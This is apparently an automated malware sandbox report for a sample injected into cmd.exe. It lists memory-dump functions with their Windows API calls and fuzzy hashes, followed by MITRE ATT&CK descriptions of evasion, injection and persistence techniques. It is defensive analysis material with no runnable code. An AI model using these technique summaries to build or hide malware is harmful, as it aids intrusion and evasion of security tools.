StrStrA.SHLWAPI(00000000,?,?,00000003,?,0303C8DA,?,?,?,00000000,?,00000000,00000000), ref: 030388DE
lstrcat.KERNEL32(00000000,?), ref: 03038916

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrlen
String ID:
API String ID: 745444535-0
Opcode ID: f53277ad42a56a698c8346fe249057b0d13677af4dd37c21273ed3b26ea202d2
Instruction ID: 746d1179e6159798016a6cb0e1e5261915834b9e4c14f306312a4514727947ce
Opcode Fuzzy Hash: f53277ad42a56a698c8346fe249057b0d13677af4dd37c21273ed3b26ea202d2
Instruction Fuzzy Hash: 7D11C676202306ABD320EB65D888F6BBBECEB86745F084569F505C3104DB34E509C725

Uniqueness

Uniqueness Score: -1.00%

Function 030443BB, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 030443C8
RtlAllocateHeap.NTDLL(00000000,00000015), ref: 030443EE
lstrcpy.KERNEL32(00000014,?), ref: 03044413
memcpy.NTDLL(?,?,?), ref: 03044420

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: AllocateHeaplstrcpylstrlenmemcpy
String ID:
API String ID: 1388643974-0
Opcode ID: dc33dab1827cd751085b0cfa4e63865ceb113681c53eafddb5c98adaf6fe40b4
Instruction ID: 5a32fbb9d430da0baa9885bba201561be3d9b4cc44f9c341ab0f960da691d224
Opcode Fuzzy Hash: dc33dab1827cd751085b0cfa4e63865ceb113681c53eafddb5c98adaf6fe40b4
Instruction Fuzzy Hash: CE1146B150130AEFCB21DF58E884A9BBBF8FB48704F148429E95A8B610C775E914CF90

Uniqueness

Uniqueness Score: -1.00%

Function 030417A2, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 030417B5
lstrlen.KERNEL32(0305C058), ref: 030417D6
RtlAllocateHeap.NTDLL(00000000,00000014), ref: 030417EE
lstrcpy.KERNEL32(00000000,0305C058), ref: 03041800

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
String ID:
API String ID: 1929783139-0
Opcode ID: 01376f03d8db4e4374e0d064de3f29cc4cd451d43aea8bb8ec92adc101e013d6
Instruction ID: 72a85132c4c63adbe2e14f824a1fcc012742006201251145f61835fa1c4f2cb6
Opcode Fuzzy Hash: 01376f03d8db4e4374e0d064de3f29cc4cd451d43aea8bb8ec92adc101e013d6
Instruction Fuzzy Hash: D901DBB7501348EBC711EBE9D884FAFBBFCAB88200F141078E90AD3205D7359649CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0304B956, Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,0305BCB8,00000000,00000000,0304F4E3,00000000,00000001,00000000,0305603C,?,?,0304BD43,00000000,00000000), ref: 0304B95D
RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 0304B975
memcpy.NTDLL(0000000C,?,00000001,?,?,0304BD43,00000000,00000000,?,?,00000000,03051CF9), ref: 0304B98B

Part of subcall function 03032734: StrTrimA.SHLWAPI(00000000,0305847C,00000000,?,0303E096,0304BD43,00000020,0305C290,?,?,0304BD43), ref: 03032778

HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000,0304BD43,00000000,00000000,?,?,00000000,03051CF9), ref: 0304B9BD

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$AllocateFreeTrimlstrlenmemcpy
String ID:
API String ID: 3208927540-0
Opcode ID: 75eecdde9f845003fa71bb61713e80b72d3e0ed810d1972401a0c6cb3814d8bb
Instruction ID: 0caa464bed9dea12bd4837c9e0a2757d5537718217b78b9cccd8e8e4b94bdc35
Opcode Fuzzy Hash: 75eecdde9f845003fa71bb61713e80b72d3e0ed810d1972401a0c6cb3814d8bb
Instruction Fuzzy Hash: C101F2B6203306ABE321AA12EC48F2B7FB8FF81B11F044439F6899A081C764DC458B60

Uniqueness

Uniqueness Score: -1.00%

Function 0303D8F8, Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0305C328), ref: 0303D903
Sleep.KERNEL32(0000000A,?,?,0303EDFB,00000000,?,0305C140), ref: 0303D90D
SetEvent.KERNEL32(?,?,0303EDFB,00000000,?,0305C140), ref: 0303D964
RtlLeaveCriticalSection.NTDLL(0305C328), ref: 0303D983

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: CriticalSection$EnterEventLeaveSleep
String ID:
API String ID: 1925615494-0
Opcode ID: eebd656fbde8fa8a7e5c774184ceec3b0dc6aa885cd015bd8b8c32928dfbc883
Instruction ID: f4da7cb6767ba75156552f8776dd67be01af0bc23240b7456bdcd77f8db4351c
Opcode Fuzzy Hash: eebd656fbde8fa8a7e5c774184ceec3b0dc6aa885cd015bd8b8c32928dfbc883
Instruction Fuzzy Hash: 2301D4B2643308ABFB50FBA4EC85F5B7AECEB05711F405022F609DA094D3799E44CB55

Uniqueness

Uniqueness Score: -1.00%

Function 03039103, Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON

Download Yara Rule

APIs

Part of subcall function 030328DA: lstrlen.KERNEL32(?,?,00000000,03039119), ref: 030328DF
Part of subcall function 030328DA: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 030328F4
Part of subcall function 030328DA: wsprintfA.USER32 ref: 03032910
Part of subcall function 030328DA: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 0303292C

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 03039131
GetFileSize.KERNEL32(00000000,00000000), ref: 03039140
CloseHandle.KERNEL32(00000000), ref: 0303914A
GetLastError.KERNEL32 ref: 03039152

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
String ID:
API String ID: 4042893638-0
Opcode ID: ac7ebee724e49504c6eb430ee70aaaa95ecdd6c85fbaf99874c8cb45494b44ad
Instruction ID: 746d65d962f7f2f25becb919d3e0da3770fcee3270c198cb50980bfd2119a8f5
Opcode Fuzzy Hash: ac7ebee724e49504c6eb430ee70aaaa95ecdd6c85fbaf99874c8cb45494b44ad
Instruction Fuzzy Hash: 97F08136203328BAD761AB69DC8CF9FBA6CEF867A1F509515F50AA5180C7B5854086A0

Uniqueness

Uniqueness Score: -1.00%

Function 03052387, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 03052399

Part of subcall function 03047420: GetLastError.KERNEL32 ref: 0304746B
Part of subcall function 03047420: WaitForSingleObject.KERNEL32(000000C8), ref: 03047490
Part of subcall function 03047420: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 030474D9
Part of subcall function 03047420: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 030474EE
Part of subcall function 03047420: SetEndOfFile.KERNEL32(00000001), ref: 030474FB
Part of subcall function 03047420: CloseHandle.KERNEL32(00000001), ref: 03047513

WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,030324DC,?,?,00001000,?,?,00001000), ref: 030523BC
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,030324DC,?,?,00001000,?,?,00001000), ref: 030523DE
GetLastError.KERNEL32(?,030324DC,?,?,00001000,?,?,00001000), ref: 030523F2

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: File$ErrorLastObjectSingleWait$CloseCreateHandlePointerWritelstrcat
String ID:
API String ID: 3733872353-0
Opcode ID: 49b686c8c070a82e09ccf2b0c899d307069a9d068447941971a18259c8ba6b6f
Instruction ID: e6f5d1465bff20747739d58e52c7a2d4de495802f8f7e676a2d290638f3ccd79
Opcode Fuzzy Hash: 49b686c8c070a82e09ccf2b0c899d307069a9d068447941971a18259c8ba6b6f
Instruction Fuzzy Hash: 26F0A432242309BBDB11AE64AC09F9F3A69FF15711F145814FA02D80E0DB7A9121976D

Uniqueness

Uniqueness Score: -1.00%

Function 0304276A, Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0305C000,00000000), ref: 03042776
RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 03042791
lstrcpy.KERNEL32(00000000,?), ref: 030427BA
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 030427DB

Part of subcall function 0304F92A: SetEvent.KERNEL32(030317CA,?,0304330E), ref: 0304F93F
Part of subcall function 0304F92A: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0304330E), ref: 0304F95F
Part of subcall function 0304F92A: RtlEnterCriticalSection.NTDLL(?), ref: 0304F97A
Part of subcall function 0304F92A: RtlLeaveCriticalSection.NTDLL(?), ref: 0304F992
Part of subcall function 0304F92A: LocalFree.KERNEL32(?), ref: 0304F9B9
Part of subcall function 0304F92A: RtlDeleteCriticalSection.NTDLL(?), ref: 0304F9C3

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: CriticalSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
String ID:
API String ID: 3339210832-0
Opcode ID: 9e259860c638702b13ed2f32104d7cc06d6aa7b1d6cabd1cf59f275db24adb2f
Instruction ID: 8d9051e44a6eae326f146e4c23caad039f9a9212fe6a8bd1b7a7d4aba9c745fd
Opcode Fuzzy Hash: 9e259860c638702b13ed2f32104d7cc06d6aa7b1d6cabd1cf59f275db24adb2f
Instruction Fuzzy Hash: 0EF0C237343311B7DB60B766EC0DF9B3A69EB85B61F051460B605AA284CA29A945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 030328DA, Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000000,03039119), ref: 030328DF
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 030328F4
wsprintfA.USER32 ref: 03032910

Part of subcall function 0303612C: memset.NTDLL ref: 03036141
Part of subcall function 0303612C: lstrlenW.KERNEL32(00000000,00000000,00000000,03056258,00000020,00000000), ref: 0303617A
Part of subcall function 0303612C: wcstombs.NTDLL ref: 03036184
Part of subcall function 0303612C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,03056258,00000020,00000000), ref: 030361B5
Part of subcall function 0303612C: TerminateProcess.KERNEL32(?,000003E5), ref: 030361F7

HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 0303292C

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: HeapProcesslstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
String ID:
API String ID: 1082581883-0
Opcode ID: 40f622de7683d33d3de29dd099cbaa48870ffb75978c065c07aded93760cc3c7
Instruction ID: 004e38d5e687337c4627c695cae5a992716d1983974e653e2335cddf44ae6371
Opcode Fuzzy Hash: 40f622de7683d33d3de29dd099cbaa48870ffb75978c065c07aded93760cc3c7
Instruction Fuzzy Hash: 73F09036103214BBC721B629EC08F7B7A6DEB83720F151121F601D6198CA29D8418A64

Uniqueness

Uniqueness Score: -1.00%

Function 0303E049, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0305C25C), ref: 0303E052
Sleep.KERNEL32(0000000A,?,?,0304BD43,00000000,00000000,?,?,00000000,03051CF9), ref: 0303E05C
HeapFree.KERNEL32(00000000,020007D0,?,?,0304BD43,00000000,00000000,?,?,00000000,03051CF9), ref: 0303E084
RtlLeaveCriticalSection.NTDLL(0305C25C), ref: 0303E0A2

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 783e3c3ede91a53e38b9084a4d471a9b67c57343a835485109403818a67f8a79
Instruction ID: 727d07f639151b594d6de876aecdfa5f5190802b3bc3598b126a3da88d617313
Opcode Fuzzy Hash: 783e3c3ede91a53e38b9084a4d471a9b67c57343a835485109403818a67f8a79
Instruction Fuzzy Hash: DAF05E362033419BE7A0EB64DC48F5B7BB8EB01301F049504F519D61A4C739E8D4CF15

Uniqueness

Uniqueness Score: -1.00%

Function 0305273F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(?,030563D8,?,?), ref: 0305275E
StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 03052795

Strings

0x, xrefs: 0305277D

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID:
String ID: 0x
API String ID: 0-3225541890
Opcode ID: d9aa2cee7c605aa72d56b012feb18c91fc022a183d1109bbce3fd2c304ca60f7
Instruction ID: 42f5cb931418fdce899a2693f0c3620ce24e4b31af23a9239143daa894303ddb
Opcode Fuzzy Hash: d9aa2cee7c605aa72d56b012feb18c91fc022a183d1109bbce3fd2c304ca60f7
Instruction Fuzzy Hash: C9017C76901619BBDB41EFA8C845AEFBBB9FF84344F044465E904E7204EB70EA09C791

Uniqueness

Uniqueness Score: -1.00%

Function 0304B38D, Relevance: 5.2, APIs: 4, Instructions: 234COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,0304BE7A,00000800,?,?,00000000,00000000), ref: 0304B5CE

Part of subcall function 03046239: GetModuleHandleA.KERNEL32(?,00000020,?,?,00000FFF,?,?,?,0304B49C,3D030561,?,?,00000000,00000000), ref: 0304625E

Part of subcall function 0304854D: memcpy.NTDLL(?,?,03051CF9,?,?,00000FFF,030471AF,030471AF,3D030561,?,?,00000000,00000000), ref: 030485B3
Part of subcall function 0304854D: memcpy.NTDLL(00000000,?,?), ref: 03048612

memcpy.NTDLL(?,?,00000000,?,?,030471AF,030471AF,030471AF,3D030561,?,?,00000000,00000000), ref: 0304B4FB
memcpy.NTDLL(?,?,00000018,?,?,030471AF,030471AF,030471AF,3D030561,?,?,00000000,00000000), ref: 0304B547
memset.NTDLL ref: 0304B64E

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: memcpy$HandleModulememset
String ID:
API String ID: 3469648518-0
Opcode ID: cd04d0c87140990085a5f9aef07e5f5d2ec2a664ddd22b1b5f72e8408418ac5d
Instruction ID: d0be938e14d2564a66882de7ae2f066fa6a5ae8ebf0a03bb9ffeee5846bb306d
Opcode Fuzzy Hash: cd04d0c87140990085a5f9aef07e5f5d2ec2a664ddd22b1b5f72e8408418ac5d
Instruction Fuzzy Hash: B39127B590220AEBDF50DF99C984BAEBBF4BF04304F144479E841AB251E735EB54CB94

Uniqueness

Uniqueness Score: -1.00%

Function 030403D8, Relevance: 5.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03040437
CloseHandle.KERNEL32(?,?,00000100,?,?,?,?,00000000), ref: 03040485
HeapFree.KERNEL32(00000000,?,?,?,00000094,0304DFE4,00000000,?,03048DB0,00000000,?,03043352,00000000,?,03032FBB,00000000), ref: 030407C9
GetLastError.KERNEL32(00000000,?,00000000), ref: 03040A10

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: CloseErrorFreeHandleHeapLastmemset
String ID:
API String ID: 2333114656-0
Opcode ID: e7f672f2c751f142fd97dc9440d9133c5f629d4d9cbb61364c2e8b555d03eee2
Instruction ID: 9c7b8e689612f49982280af1ddfa82b1c1f69cf1d9464f8bfd835b49413b5d76
Opcode Fuzzy Hash: e7f672f2c751f142fd97dc9440d9133c5f629d4d9cbb61364c2e8b555d03eee2
Instruction Fuzzy Hash: F141C8F5513318BADB21EF64CC41FEFBA6DAB85750F044431FA05BA190D670CB658BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0304D7DD, Relevance: 5.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,0304CAA3,00000000,?,?,?,0304CAA3,?,?,?,?,?), ref: 0304D81B
memcpy.NTDLL(?,?,?,?,?,?,?), ref: 0304D8A8
memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 0304D8E6
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0304D8F4

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: memcpy$FreeLocal
String ID:
API String ID: 2365274387-0
Opcode ID: 953995000a582fe5d85db3fc4ad90933524f6443d072c24d637a2347d7611f6b
Instruction ID: 96474bf4dd8aa4ef3008ace919c6c939dc8bc2bc043062ccd7ad5060cd5acc4f
Opcode Fuzzy Hash: 953995000a582fe5d85db3fc4ad90933524f6443d072c24d637a2347d7611f6b
Instruction Fuzzy Hash: C841EAB680221AAFDF11EF65DC459DF7FA8EF54260B054429FC14A7221E731EE608BE0

Uniqueness

Uniqueness Score: -1.00%

Function 03052203, Relevance: 5.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0305224E
memset.NTDLL ref: 03052265
memset.NTDLL ref: 0305227C
memset.NTDLL ref: 03052294

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 0a16503335317cf2c4c6cf7da9ab8311a011e79c52676c4df75e28cf43eb5de3
Instruction ID: 87e5af7d128e85c1ff634384ea154c74e1210fb4b6ff5481dff95a1ebbd593e7
Opcode Fuzzy Hash: 0a16503335317cf2c4c6cf7da9ab8311a011e79c52676c4df75e28cf43eb5de3
Instruction Fuzzy Hash: 93215EBA50250DBBCB61DF91DC80A6ABB6DFF49340B480928FD4596C10D732B9B5CAE1

Uniqueness

Uniqueness Score: -1.00%

Function 0303A736, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0304D371,00000000,00000000,0305C238,00000008,0305B064,00000000,?,?,03051190), ref: 0303A742

Part of subcall function 030463A7: RtlAllocateHeap.NTDLL(00000000,00000001,030318D4), ref: 030463B3

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0304D371,00000000,00000000,0305C238,00000008,0305B064,00000000), ref: 0303A7A0
lstrcpy.KERNEL32(00000000,0305C238), ref: 0303A7B0
lstrcpy.KERNEL32(00000000,00000000), ref: 0303A7BC

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 101a9eceb77bcbe21e14a14f381916404576c60d17f5bfa0ed0c8ab5ace6a2b9
Instruction ID: efb83e1ab2645be20fc04d7e45e685fc2dc2343aeab649a7827dda7ed57f80e5
Opcode Fuzzy Hash: 101a9eceb77bcbe21e14a14f381916404576c60d17f5bfa0ed0c8ab5ace6a2b9
Instruction Fuzzy Hash: D821607A606259ABCB52AF64CC88AEFBFFD9F47254F094054F9459F201E735CA0097E0

Uniqueness

Uniqueness Score: -1.00%

Function 03044F8F, Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03044FC3
memset.NTDLL ref: 03044FDA
memset.NTDLL ref: 03044FF1
memset.NTDLL ref: 03045009

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 261850b658884f2db413fd54b0a4245336d5751821a61d5e734fdc7df961970c
Instruction ID: 7ecae66f1fce4a47c9cfa7db4af32aef9894edf74ce70e8301bba358ef4c882f
Opcode Fuzzy Hash: 261850b658884f2db413fd54b0a4245336d5751821a61d5e734fdc7df961970c
Instruction Fuzzy Hash: EC11A3B6502A09BFDB50DFD2DC44AA6B768FF0A300B080578F94495811D773FAB59BD1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
